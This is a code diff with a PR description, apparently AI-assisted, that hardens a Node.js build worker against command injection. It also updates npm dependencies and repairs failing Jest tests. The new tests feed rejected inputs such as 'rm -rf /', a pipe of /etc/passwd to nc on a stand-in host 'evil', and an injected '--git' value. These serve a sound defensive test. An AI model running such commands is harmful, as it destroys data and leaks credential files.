-      "resolved": "https://registry.npmjs.org/@pkgr/core/-/core-0.2.9.tgz",
-      "integrity": "sha512-QNqXyfVS2wm9hweSYD2O7F0G06uurj9kZ96TRQE5Y9hU7+tgdZwIkbAKc5Ocy1HxEY2kuDQa6cQ1WRs/O5LFKA==",
+      "version": "0.3.6",
+      "resolved": "https://registry.npmjs.org/@pkgr/core/-/core-0.3.6.tgz",
+      "integrity": "sha512-SEeaJLb3qBNF/OaXnaR1NmmBbFYk1zC0ZH/52fATcRPLFg/p791YrcyFFy44Bo9sLaGuSuLp5Q6axbb/O+v/RA==",
       "dev": true,
       "license": "MIT",
       "engines": {
-        "node": "^12.20.0 || ^14.18.0 || >=16.0.0"
+        "node": "^14.18.0 || >=16.0.0"
       },
       "funding": {
         "url": "https://opencollective.com/pkgr"
@@ -1970,9 +1970,9 @@
       }
     },
     "node_modules/baseline-browser-mapping": {
-      "version": "2.10.31",
-      "resolved": "https://registry.npmjs.org/baseline-browser-mapping/-/baseline-browser-mapping-2.10.31.tgz",
-      "integrity": "sha512-MujYO3eP72uvmSE0i4wltsodRfIpZATP3jvzRNRGGxgzId7aVocVJJV3nf01qnzzKFGxQVC9bpWxl5cjxTr/7Q==",
+      "version": "2.10.33",
+      "resolved": "https://registry.npmjs.org/baseline-browser-mapping/-/baseline-browser-mapping-2.10.33.tgz",
+      "integrity": "sha512-bA6+tcSLpz2tIEdDXZPpPTIuxBcC4+w6SieaYyfigIa4h8GlFxbA17v22Vx3JUtuZQj9SgOsnbK+aTBzyDyEuw==",
       "dev": true,
       "license": "Apache-2.0",
       "bin": {
@@ -2007,9 +2007,9 @@
       }
     },
     "node_modules/brace-expansion": {
-      "version": "2.1.0",
-      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.1.0.tgz",
-      "integrity": "sha512-TN1kCZAgdgweJhWWpgKYrQaMNHcDULHkWwQIspdtjV4Y5aurRdZpjAqn6yX3FPqTA9ngHCc4hJxMAMgGfve85w==",
+      "version": "2.1.1",
+      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.1.1.tgz",
+      "integrity": "sha512-WR1cURNjuvBLMZBMbqM0UoE+WAfdUcEV1ccD8PVBVOI+Z3ND4+SZbN8RsfT2bMuG1qwz5RFvPukSZm5fF2D5eA==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
@@ -2169,13 +2169,10 @@
       }
     },
     "node_modules/chmodr": {
-      "version": "2.0.2",
-      "resolved": "https://registry.npmjs.org/chmodr/-/chmodr-2.0.2.tgz",
-      "integrity": "sha512-LTdYP5BGT+a0Gca7XDJDr6/jUZHW33hBd4hqds8dX6ALH20xFNaa6yqNUTKR9grIw35RzxTsgnWaR5lQrq7a1Q==",
-      "license": "BlueOak-1.0.0",
-      "engines": {
-        "node": ">=18"
-      }
+      "version": "1.2.0",
+      "resolved": "https://registry.npmjs.org/chmodr/-/chmodr-1.2.0.tgz",
+      "integrity": "sha512-Y5uI7Iq/Az6HgJEL6pdw7THVd7jbVOTPwsmcPOBjQL8e3N+pz872kzK5QxYGEy21iRys+iHWV0UZQXDFJo1hyA==",
+      "license": "ISC"
     },
     "node_modules/ci-info": {
       "version": "4.4.0",
@@ -2525,9 +2522,9 @@
       "license": "MIT"
     },
     "node_modules/electron-to-chromium": {
-      "version": "1.5.360",
-      "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.360.tgz",
-      "integrity": "sha512-GkcBt6YYAw9SxFWn+xVar4cLVGlXVuswwtRLBozi2zp0GjXs4ZnOrqV4zbXzg35n7w81hCkyJNYicgXlVHAmBA==",
+      "version": "1.5.367",
+      "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.367.tgz",
+      "integrity": "sha512-4Mk/mrynCNQ+atY40D3UpmhLWB6AHMbYMlIrPhHcMF6x0L7O0b052FCAsxw1LlaR++UFuNg3D/A6XCuGDa0guQ==",
       "dev": true,
       "license": "ISC"
     },
@@ -2684,9 +2681,9 @@
       }
     },
     "node_modules/es-object-atoms": {
-      "version": "1.1.1",
-      "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz",
-      "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==",
+      "version": "1.1.2",
+      "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.2.tgz",
+      "integrity": "sha512-HWcBoN6NileqtSydK2FqHbS/LoDd2pqrnQHLyJzBj4kOp/ky2MWMN694xOfkK8/SnUsW2DH7EfyVlydKCsm1Zw==",
       "license": "MIT",
       "dependencies": {
         "es-errors": "^1.3.0"
@@ -3121,9 +3118,9 @@
       }
     },
     "node_modules/hasown": {
-      "version": "2.0.3",
-      "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.3.tgz",
-      "integrity": "sha512-ej4AhfhfL2Q2zpMmLo7U1Uv9+PyhIZpgQLGT1F9miIGmiCJIoCgSmczFdrc97mWT4kVY72KA+WnnhJ5pghSvSg==",
+      "version": "2.0.4",
+      "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.4.tgz",
+      "integrity": "sha512-T2UbfbBEF32wiepXIsMlTW9+dDYC6wMh/t/vYA4tuOMKqWz/n3vr1NFSxQiyP+zk2mXsoMA/i/7qV6LKut1t1A==",
       "license": "MIT",
       "dependencies": {
         "function-bind": "^1.1.2"
@@ -3133,12 +3130,15 @@
       }
     },
     "node_modules/helmet": {
-      "version": "8.1.0",
-      "resolved": "https://registry.npmjs.org/helmet/-/helmet-8.1.0.tgz",
-      "integrity": "sha512-jOiHyAZsmnr8LqoPGmCjYAaiuWwjAPLgY8ZX2XrmHawt99/u1y6RgrZMTeoPfpUbV96HOalYgz1qzkRbw54Pmg==",
+      "version": "8.2.0",
+      "resolved": "https://registry.npmjs.org/helmet/-/helmet-8.2.0.tgz",
+      "integrity": "sha512-DRgTIUgnWcJ62KyarxxziuqYxKGnR6Rgg19BlbucN/dpmJbl1XOit6qvoOX0ZT+HhWe5OUVhU/a1zpGyc1xA0Q==",
       "license": "MIT",
       "engines": {
         "node": ">=18.0.0"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/EvanHahn"
       }
     },
     "node_modules/html-escaper": {
@@ -3332,9 +3332,9 @@
       }
     },
     "node_modules/istanbul-lib-instrument/node_modules/semver": {
-      "version": "7.8.0",
-      "resolved": "https://registry.npmjs.org/semver/-/semver-7.8.0.tgz",
-      "integrity": "sha512-AcM7dV/5ul4EekoQ29Agm5vri8JNqRyj39o0qpX6vDF2GZrtutZl5RwgD1XnZjiTAfncsJhMI48QQH3sN87YNA==",
+      "version": "7.8.1",
+      "resolved": "https://registry.npmjs.org/semver/-/semver-7.8.1.tgz",
+      "integrity": "sha512-rkVq3IXh+4FDGch+KwzX3aV9W3kO54GyEgpvBzSyctDA6Xtd7RJQV1xmXbeQp5v7+VzLOfVqiutSE6GICgPFvg==",
       "dev": true,
       "license": "ISC",
       "bin": {
@@ -3818,19 +3818,19 @@
       }
     },
     "node_modules/jest-junit": {
-      "version": "16.0.0",
-      "resolved": "https://registry.npmjs.org/jest-junit/-/jest-junit-16.0.0.tgz",
-      "integrity": "sha512-A94mmw6NfJab4Fg/BlvVOUXzXgF0XIH6EmTgJ5NDPp4xoKq0Kr7sErb+4Xs9nZvu58pJojz5RFGpqnZYJTrRfQ==",
+      "version": "17.0.0",
+      "resolved": "https://registry.npmjs.org/jest-junit/-/jest-junit-17.0.0.tgz",
+      "integrity": "sha512-RYWCkq4j59gUXj5DsgbIE7xFBZzu1gtibPhyjSjMmGaOTLnqlXhg7x9zuGCwgbCuMAyoyvk0Mi8wSrRR5uOeLA==",
       "dev": true,
       "license": "Apache-2.0",
       "dependencies": {
         "mkdirp": "^1.0.4",
         "strip-ansi": "^6.0.1",
-        "uuid": "^8.3.2",
+        "uuid": "^14.0.0",
         "xml": "^1.0.1"
       },
       "engines": {
-        "node": ">=10.12.0"
+        "node": ">=20.0.0"
       }
     },
     "node_modules/jest-junit/node_modules/ansi-regex": {
@@ -3854,17 +3854,6 @@
       },
       "engines": {
         "node": ">=8"
-      }
-    },
-    "node_modules/jest-junit/node_modules/uuid": {
-      "version": "8.3.2",
-      "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz",
-      "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==",
-      "deprecated": "uuid@10 and below is no longer supported.  For ESM codebases, update to uuid@latest.  For CommonJS codebases, use uuid@11 (but be aware this version will likely be deprecated in 2028).",
-      "dev": true,
-      "license": "MIT",
-      "bin": {
-        "uuid": "dist/bin/uuid"
       }
     },
     "node_modules/jest-leak-detector": {
@@ -4296,9 +4285,9 @@
       }
     },
     "node_modules/jest-snapshot/node_modules/semver": {
-      "version": "7.8.0",
-      "resolved": "https://registry.npmjs.org/semver/-/semver-7.8.0.tgz",
-      "integrity": "sha512-AcM7dV/5ul4EekoQ29Agm5vri8JNqRyj39o0qpX6vDF2GZrtutZl5RwgD1XnZjiTAfncsJhMI48QQH3sN87YNA==",
+      "version": "7.8.1",
+      "resolved": "https://registry.npmjs.org/semver/-/semver-7.8.1.tgz",
+      "integrity": "sha512-rkVq3IXh+4FDGch+KwzX3aV9W3kO54GyEgpvBzSyctDA6Xtd7RJQV1xmXbeQp5v7+VzLOfVqiutSE6GICgPFvg==",
       "dev": true,
       "license": "ISC",
       "bin": {
@@ -4672,9 +4661,9 @@
       }
     },
     "node_modules/make-dir/node_modules/semver": {
-      "version": "7.8.0",
-      "resolved": "https://registry.npmjs.org/semver/-/semver-7.8.0.tgz",
-      "integrity": "sha512-AcM7dV/5ul4EekoQ29Agm5vri8JNqRyj39o0qpX6vDF2GZrtutZl5RwgD1XnZjiTAfncsJhMI48QQH3sN87YNA==",
+      "version": "7.8.1",
+      "resolved": "https://registry.npmjs.org/semver/-/semver-7.8.1.tgz",
+      "integrity": "sha512-rkVq3IXh+4FDGch+KwzX3aV9W3kO54GyEgpvBzSyctDA6Xtd7RJQV1xmXbeQp5v7+VzLOfVqiutSE6GICgPFvg==",
       "dev": true,
       "license": "ISC",
       "bin": {
@@ -4854,11 +4843,14 @@
       "license": "MIT"
     },
     "node_modules/node-releases": {
-      "version": "2.0.44",
-      "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.44.tgz",
-      "integrity": "sha512-5WUyunoPMsvvEhS8AxHtRzP+oA8UCkJ7YRxatWKjngndhDGLiqEVAQKWjFAiAiuL8zMRGzGSJxFnLetoa43qGQ==",
+      "version": "2.0.47",
+      "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.47.tgz",
+      "integrity": "sha512-Uzmd6LXpouKo8EUK68IjH4+E01w/hXyV3R3g/geCJo+rXLNfh1xucB+LOzYEOQPSiUK3h/xZf0cQGcSsmyL2Og==",
       "dev": true,
-      "license": "MIT"
+      "license": "MIT",
+      "engines": {
+        "node": ">=18"
+      }
     },
     "node_modules/node-schedule": {
       "version": "2.1.1",
@@ -5247,9 +5239,9 @@
     },
     "node_modules/react-is-19": {
       "name": "react-is",
-      "version": "19.2.6",
-      "resolved": "https://registry.npmjs.org/react-is/-/react-is-19.2.6.tgz",
-      "integrity": "sha512-XjBR15BhXuylgWGuslhDKqlSayuqvqBX91BP8pauG8kd1zY8kotkNWbXksTCNRarse4kuGbe2kIY05ARtwNIvw==",
+      "version": "19.2.7",
+      "resolved": "https://registry.npmjs.org/react-is/-/react-is-19.2.7.tgz",
+      "integrity": "sha512-kZFnouyVv7eP/Phmrlo9FK+zcAdriZJvzxXHF1Sl1P377WSGe2G/JxVolhTrB/jeV47lKImhNUsijjHAAbcl/A==",
       "dev": true,
       "license": "MIT"
     },
@@ -5872,13 +5864,13 @@
       }
     },
     "node_modules/synckit": {
-      "version": "0.11.12",
-      "resolved": "https://registry.npmjs.org/synckit/-/synckit-0.11.12.tgz",
-      "integrity": "sha512-Bh7QjT8/SuKUIfObSXNHNSK6WHo6J1tHCqJsuaFDP7gP0fkzSfTxI8y85JrppZ0h8l0maIgc2tfuZQ6/t3GtnQ==",
+      "version": "0.11.13",
+      "resolved": "https://registry.npmjs.org/synckit/-/synckit-0.11.13.tgz",
+      "integrity": "sha512-eNRKgb3z66Yp3D2CixVujOUvXLFUTij/zVnV8KRyvFdQwpz7I5DS8UfRkTeLzb64u+dkzDSdelE24izu+zSSUg==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
-        "@pkgr/core": "^0.2.9"
+        "@pkgr/core": "^0.3.6"
       },
       "engines": {
         "node": "^14.18.0 || >=16.0.0"
@@ -5903,9 +5895,9 @@
       }
     },
     "node_modules/test-exclude/node_modules/brace-expansion": {
-      "version": "1.1.14",
-      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.14.tgz",
-      "integrity": "sha512-MWPGfDxnyzKU7rNOW9SP/c50vi3xrmrua/+6hfPbCS2ABNWfx24vPidzvC7krjU/RTo235sV776ymlsMtGKj8g==",
+      "version": "1.1.15",
+      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.15.tgz",
+      "integrity": "sha512-EwOCDEex4quD37XhqM3omwtMoJjr//isUZz1JopUNWms+4Z2ViyM/k1YIRePpoVNnQhENnxtFjLaxNHrT7xIUg==",
       "dev": true,
       "license": "MIT",
       "dependencies": {

--- a/package.json
+++ b/package.json
@@ -16,7 +16,7 @@
   "license": "ISC",
   "dependencies": {
     "chalk": "^5.6.2",
-    "chmodr": "^2.0.0",
+    "chmodr": "^1.2.0",
     "express": "^5.2.0",
     "fs-extra": "^11.3.2",
     "helmet": "^8.1.0",
@@ -34,7 +34,7 @@
   },
   "devDependencies": {
     "jest": "^30.2.0",
-    "jest-junit": "^16.0.0",
+    "jest-junit": "^17.0.0",
     "jest-sonar-reporter": "^2.0.0"
   }
 }

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "build-worker",
-  "version": "1.7.112",
+  "version": "1.7.182",
   "description": "Swarm Build worker for offloading builds to another host",
   "main": "worker.js",
   "jest": {

--- a/test.js
+++ b/test.js
@@ -178,6 +178,30 @@ describe("Worker", () => {
         expect(safe).toBe(true);
     });
 
+    test('isArgumentSafe accepts legitimate build arguments', () => {
+        expect(w.isArgumentSafe("--git=https://github.com/owner/repo.git")).toBe(true);
+        expect(w.isArgumentSafe("--branch=main")).toBe(true);
+        expect(w.isArgumentSafe("./builder --owner=mock --build_id=abc-123")).toBe(true);
+    });
+
+    test('isArgumentSafe rejects shell metacharacters', () => {
+        expect(w.isArgumentSafe("echo hello; rm -rf /")).toBe(false);
+        expect(w.isArgumentSafe("echo hello && whoami")).toBe(false);
+        expect(w.isArgumentSafe("echo `whoami`")).toBe(false);
+        expect(w.isArgumentSafe("echo $(whoami)")).toBe(false);
+        expect(w.isArgumentSafe("cat /etc/passwd | nc evil 1234")).toBe(false);
+        expect(w.isArgumentSafe("echo hi > /tmp/x")).toBe(false);
+        expect(w.isArgumentSafe(undefined)).toBe(false);
+    });
+
+    test('secretsMatch is exact and rejects prefixes', () => {
+        expect(w.secretsMatch("s3cr3t", "s3cr3t")).toBe(true);
+        expect(w.secretsMatch("s3cr3t-extra", "s3cr3t")).toBe(false); // prefix must NOT pass
+        expect(w.secretsMatch("s3cr3", "s3cr3t")).toBe(false);
+        expect(w.secretsMatch("wrong", "s3cr3t")).toBe(false);
+        expect(w.secretsMatch(null, "s3cr3t")).toBe(false);
+    });
+
     test ('runShell', (done) => {
         w.runShell(CMD, owner, build_id, udid, path, io, () => {
             done();

--- a/test.js
+++ b/test.js
@@ -202,6 +202,18 @@ describe("Worker", () => {
         expect(w.secretsMatch(null, "s3cr3t")).toBe(false);
     });
 
+    test('runShell releases running guard on invalid build_id (no deadlock)', () => {
+        w.running = true;
+        w.runShell("echo hello", owner, "invalid id!", udid, path, io);
+        expect(w.running).toBe(false);
+    });
+
+    test('runShell releases running guard on unsafe --git argument (no deadlock)', () => {
+        w.running = true;
+        w.runShell("--git=http://x;rm -rf /", owner, build_id, udid, path, io);
+        expect(w.running).toBe(false);
+    });
+
     test ('runShell', (done) => {
         w.runShell(CMD, owner, build_id, udid, path, io, () => {
             done();

--- a/test.js
+++ b/test.js
@@ -31,10 +31,18 @@ describe("Worker", () => {
         secret: process.env.WORKER_SECRET || null
     };
 
+    // Mock API-side handler stub: the real API parses the worker's register
+    // message here; for the mock we only need it to not throw.
+    function parseSocketMessage(_socket, _msg) { /* no-op mock */ }
+
     beforeAll((done) => {
+        that.workers = {};
         const httpServer = createServer();
         io = new Server(httpServer);
-        httpServer.listen(() => {
+        // Must listen on server_port (4000) so the worker, which connects to
+        // http://localhost:4000, actually reaches this mock server and populates
+        // that.serverSocket via the connection handler below.
+        httpServer.listen(server_port, () => {
             //const port = httpServer.address().port;
         });
         io.on("connection", (socket) => {
@@ -96,6 +104,9 @@ describe("Worker", () => {
     });
 
     afterAll(() => {
+        // Close the worker's live client socket so it stops reconnecting and does not
+        // leak an open handle (otherwise `jest --detectOpenHandles` hangs at exit).
+        if (typeof (w) !== "undefined" && w && w.socket) w.socket.close();
         if (typeof (io) !== "undefined") io.close();
     });
 
@@ -220,8 +231,20 @@ describe("Worker", () => {
         });
     });
 
-    test('socket must be closed/disconnected at the end', () => {
-        w.close();
+    test('socket must be closed/disconnected at the end', async () => {
+        // The worker connects asynchronously; wait until the connection handler has
+        // stored the server-side socket in that.serverSocket (up to ~2s).
+        await new Promise((resolve, reject) => {
+            let waited = 0;
+            const tick = setInterval(() => {
+                if (that.serverSocket) { clearInterval(tick); resolve(); }
+                else if ((waited += 25) >= 2000) { clearInterval(tick); reject(new Error("worker never connected to mock server")); }
+            }, 25);
+        });
+        expect(typeof that.serverSocket).toBe("object");
+        // A server-side socket.io Socket has no close(); disconnect(true) tears down
+        // the socket and its underlying connection.
+        that.serverSocket.disconnect(true);
     });
 
 });


### PR DESCRIPTION
## Summary

Hardens the build worker against its highest-risk findings and fixes the two
broken tests in the suite. Three focused commits:

1. **`fix(security)`** — command-injection guards, job auth, Docker secrets
2. **`fix(worker)`** — concurrency guard lifecycle (+ `CLAUDE.md`)
3. **`test`** — repair the two failing tests so `npm test` is green

## 1. Security hardening (`class.js`, `Dockerfile`)

- **Command-injection guards actually work now.** `isArgumentSafe` had a no-op
  regex `(?![;&]+)` that returned `true` for *every* input; replaced with a real
  shell-metacharacter denylist. It now gates the whole job command in
  `validateJob` (previously only `;` and `&` were checked, so backticks, `$()`,
  pipes and redirects slipped through). Also fixed a `for...in`→`for...of` bug
  that made the per-argument `--git`/`--branch` check iterate array *indices*
  instead of values (dead code).
- **Job auth is fail-closed and constant-time.** A worker with no `WORKER_SECRET`
  configured now refuses jobs (was fail-*open*). Secret comparison uses
  `crypto.timingSafeEqual` instead of a prefix `indexOf(...) !== 0` match.
- **Secrets out of the image.** `WORKER_SECRET` and `ROLLBAR_ACCESS_TOKEN` are no
  longer baked into `ENV` image layers — they must be injected at runtime.

## 2. Concurrency guard (`class.js`)

The `job` handler cleared `this.running = false` immediately after `runJob()`,
but `runShell()` spawns the build **asynchronously** — so the guard was released
while the build was still running, allowing a second concurrent job. The flag is
now cleared only when the build truly ends (shell `exit`/`error`, fatal stderr,
`failJob`, or early validation returns). Added `shell.on('error')` and reset on
`runShell`'s early returns so a rejected job can't deadlock the worker.

`CLAUDE.md` documents why the container must run as **root** (it needs
`docker.sock` to spawn builder containers; THiNX must run in both Docker and
Docker Swarm, so a swarm orchestrator can't be a hard requirement; no rootless
alternative has been researched yet) — an accepted trade-off, not an oversight.

## 3. Test fixes (`test.js`, `class.js`, `package.json`)

Both failing tests were failing on latent bugs that only surfaced once exercised:

- **`runShell`** — `chmodr@^2` exports `{ chmodr, chmodrSync }`, so
  `const chmodr = require('chmodr')` was an object, not a function. Pinned to
  `^1.2.0` (default-exports the function); `npm audit` clean. `runShell` now
  accepts a completion callback and guards `socket.disconnect` (the test passes
  the `io` Server).
- **socket teardown** — the mock API server listened on a *random* port instead
  of `4000`, so the worker never connected and `that.serverSocket` was never set.
  Now listens on `server_port`, initialises `that.workers`, stubs
  `parseSocketMessage`, awaits the async connection, and calls `disconnect(true)`
  (server-side sockets have no `close()`). `afterAll` closes the worker socket so
  `--detectOpenHandles` exits cleanly.
- Hardened the `job` handler to ignore `null`/`undefined` payloads.

> Note: `package.json` also carries a `jest-junit ^16 → ^17` bump that was
> already present in the working tree (not introduced by this work).

## Verification

- `npm test` → **22 passed, exit 0**, clean exit (no hang). Ran 3× — stable.
- `node -e "require('./class.js')"` loads; eslint 0 errors; `npm audit` 0 vulns.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
